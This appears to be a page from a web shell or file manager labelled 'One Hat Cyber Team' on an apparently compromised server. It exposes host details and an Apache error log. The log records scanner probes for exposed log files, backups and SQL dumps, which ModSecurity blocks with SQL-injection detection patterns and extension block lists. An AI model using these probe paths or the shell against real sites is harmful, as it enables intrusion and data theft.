⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.81
Server IP:
178.33.27.10
Server:
Linux cpanel.dev-unit.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
Server Software:
Apache/2.4.62 (Unix) OpenSSL/1.0.2k-fips
PHP Version:
8.2.25
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
local
/
apache
/
domlogs
/
View File Name :
cms-1.dev-unit.com.error.log
[Tue Jun 10 06:04:42.667598 2025] [authz_core:error] [pid 18401:tid 140121764493056] [client 165.227.173.41:39042] AH01630: client denied by server configuration: /home/id/cms-1.dev-unit.com/server-status [Tue Jun 10 06:04:43.525741 2025] [authz_core:error] [pid 18343:tid 140121688958720] [client 207.154.197.113:46620] AH01630: client denied by server configuration: /home/id/cms-1.dev-unit.com/server-status [Tue Jun 10 06:04:43.557825 2025] [:error] [pid 18343:tid 140121680566016] [client 165.227.173.41:39134] File does not exist: /home/id/cms-1.dev-unit.com/info.php [Tue Jun 10 06:04:44.085239 2025] [:error] [pid 18342:tid 140121798063872] [client 207.154.197.113:46702] File does not exist: /home/id/cms-1.dev-unit.com/info.php [Tue Jun 10 06:12:59.052895 2025] [autoindex:error] [pid 18343:tid 140121823241984] [client 185.24.11.176:38396] AH01276: Cannot serve directory /home/id/cms-1.dev-unit.com/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Jun 10 08:06:41.394765 2025] [autoindex:error] [pid 18342:tid 140121688958720] [client 196.132.65.152:48470] AH01276: Cannot serve directory /home/id/cms-1.dev-unit.com/assets/front/fonts/sofia/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://cms-1.dev-unit.com/assets/front/css/ecommerce-style.css [Tue Jun 10 08:36:44.157491 2025] [autoindex:error] [pid 18343:tid 140121789671168] [client 196.132.65.152:30818] AH01276: Cannot serve directory /home/id/cms-1.dev-unit.com/assets/front/fonts/sofia/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://cms-1.dev-unit.com/assets/front/css/ecommerce-style.css [Tue Jun 10 08:36:47.114230 2025] [autoindex:error] [pid 18343:tid 140121722529536] [client 196.132.65.152:30767] AH01276: Cannot serve directory /home/id/cms-1.dev-unit.com/assets/front/fonts/sofia/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://cms-1.dev-unit.com/assets/front/css/ecommerce-style.css [Tue Jun 10 08:36:58.426452 2025] [autoindex:error] [pid 18343:tid 140121781278464] [client 196.132.65.152:30836] AH01276: Cannot serve directory /home/id/cms-1.dev-unit.com/assets/front/fonts/sofia/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://cms-1.dev-unit.com/assets/front/css/ecommerce-style.css [Tue Jun 10 08:37:11.383843 2025] [autoindex:error] [pid 18343:tid 140121806456576] [client 196.132.65.152:30777] AH01276: Cannot serve directory /home/id/cms-1.dev-unit.com/assets/front/fonts/sofia/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://cms-1.dev-unit.com/assets/front/css/ecommerce-style.css [Sun Jun 15 03:33:25.856863 2025] [core:error] [pid 32623:tid 140503764899584] [client 46.101.106.207:36254] Script timed out before returning headers: index.php [Sun Jun 15 03:33:27.549004 2025] [core:error] [pid 32623:tid 140503756506880] [client 46.101.106.207:56594] Script timed out before returning headers: index.php [Tue Jun 17 21:22:27.081279 2025] [:error] [pid 14969:tid 140672812128000] [client 196.221.7.26:64384] [client 196.221.7.26] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\sexec\\\\s+xp_cmdshell)|(?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?!\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\w])|(?:from\\\\W+information_schema\\\\W)|(?:(?:(?:current_)?user|database|schema|connection_id)\\\\s*?\\\\([^\\\\)]*?)|(?:[\\"'`\\xc2\\xb4\\xe2 ..." at ARGS:styles. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "207"] [id "981255"] [msg "Detects MSSQL code execution and information gathering attempts"] [data "Matched Data: \\x22selecto found within ARGS:styles: [{\\x22selectors\\x22:[\\x22#statisticsSection\\x22],\\x22style\\x22:{\\x22background-image\\x22:\\x22url(https://cms-1.dev-unit.com/assets/front/img/618d04b8a8775.jpg)\\x22,\\x22background-size\\x22:\\x22cover\\x22,\\x22padding\\x22:\\x22100px 0px\\x22}}]"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "cms-1.dev-unit.com"] [uri "/admin/pagebuilder/save"] [unique_id "aFGyY9JYX7Ej7UJM_tCuAQAAANM"], referer: https://cms-1.dev-unit.com/admin/pagebuilder/content?type=themeHome&theme=lawyer&language=en [Sun Jun 29 23:20:19.419478 2025] [:error] [pid 29227:tid 140563575682816] [client 185.177.72.179:61548] [client 185.177.72.179] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/storage/logs/laravel.log"] [unique_id "aGGgAwPeD2HuyYHWGKZwfwAAAFE"] [Sun Jun 29 23:20:19.427689 2025] [:error] [pid 29227:tid 140563542112000] [client 185.177.72.179:61548] [client 185.177.72.179] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/storage/logs/error.log"] [unique_id "aGGgAwPeD2HuyYHWGKZwgAAAAFU"] [Sun Jun 29 23:20:19.438382 2025] [:error] [pid 29227:tid 140563516933888] [client 185.177.72.179:61548] [client 185.177.72.179] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/logs/debug.log"] [unique_id "aGGgAwPeD2HuyYHWGKZwgQAAAFg"] [Sun Jun 29 23:20:19.446698 2025] [:error] [pid 29227:tid 140563676395264] [client 185.177.72.179:61548] [client 185.177.72.179] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/logs/app.log"] [unique_id "aGGgAwPeD2HuyYHWGKZwggAAAEU"] [Sun Jun 29 23:20:19.454951 2025] [:error] [pid 29227:tid 140563617646336] [client 185.177.72.179:61548] [client 185.177.72.179] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/debug.log"] [unique_id "aGGgAwPeD2HuyYHWGKZwgwAAAEw"] [Sun Jun 29 23:20:19.463150 2025] [:error] [pid 29227:tid 140563533719296] [client 185.177.72.179:61548] [client 185.177.72.179] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/error.log"] [unique_id "aGGgAwPeD2HuyYHWGKZwhAAAAFY"] [Sun Jun 29 23:20:20.022985 2025] [:error] [pid 29227:tid 140563759286016] [client 185.177.72.179:61548] [client 185.177.72.179] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/.backup"] [unique_id "aGGgBAPeD2HuyYHWGKZwhwAAAEQ"] [Sun Jun 29 23:20:20.029073 2025] [:error] [pid 29227:tid 140563558897408] [client 185.177.72.179:61548] [client 185.177.72.179] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/db.sql"] [unique_id "aGGgBAPeD2HuyYHWGKZwiAAAAFM"] [Sun Jun 29 23:20:20.080957 2025] [:error] [pid 29227:tid 140563767678720] [client 185.177.72.179:61548] [client 185.177.72.179] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/dump.sql"] [unique_id "aGGgBAPeD2HuyYHWGKZwiQAAAEM"] [Sun Jun 29 23:20:20.198674 2025] [:error] [pid 29227:tid 140563567290112] [client 185.177.72.179:61548] [client 185.177.72.179] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/database.sql"] [unique_id "aGGgBAPeD2HuyYHWGKZwigAAAFI"] [Mon Jun 30 00:15:47.110783 2025] [:error] [pid 29331:tid 140563567290112] [client 185.177.72.10:54858] [client 185.177.72.10] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/storage/logs/laravel.log"] [unique_id "aGGtA3YyGnwcPpPuQvPfOgAAANI"] [Mon Jun 30 00:15:47.119197 2025] [:error] [pid 29331:tid 140563609253632] [client 185.177.72.10:54858] [client 185.177.72.10] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/storage/logs/error.log"] [unique_id "aGGtA3YyGnwcPpPuQvPfOwAAAM0"] [Mon Jun 30 00:15:47.126603 2025] [:error] [pid 29331:tid 140563659609856] [client 185.177.72.10:54858] [client 185.177.72.10] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/logs/debug.log"] [unique_id "aGGtA3YyGnwcPpPuQvPfPAAAAMc"] [Mon Jun 30 00:15:47.133974 2025] [:error] [pid 29331:tid 140563542112000] [client 185.177.72.10:54858] [client 185.177.72.10] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/logs/app.log"] [unique_id "aGGtA3YyGnwcPpPuQvPfPQAAANU"] [Mon Jun 30 00:15:47.140243 2025] [:error] [pid 29331:tid 140563767678720] [client 185.177.72.10:54858] [client 185.177.72.10] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/debug.log"] [unique_id "aGGtA3YyGnwcPpPuQvPfPgAAAMM"] [Mon Jun 30 00:15:47.146457 2025] [:error] [pid 29331:tid 140563676395264] [client 185.177.72.10:54858] [client 185.177.72.10] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/error.log"] [unique_id "aGGtA3YyGnwcPpPuQvPfPwAAAMU"] [Mon Jun 30 00:15:47.648491 2025] [:error] [pid 29331:tid 140563776071424] [client 185.177.72.10:54858] [client 185.177.72.10] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/.backup"] [unique_id "aGGtA3YyGnwcPpPuQvPfQwAAAMI"] [Mon Jun 30 00:15:47.656799 2025] [:error] [pid 29331:tid 140563558897408] [client 185.177.72.10:54858] [client 185.177.72.10] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver 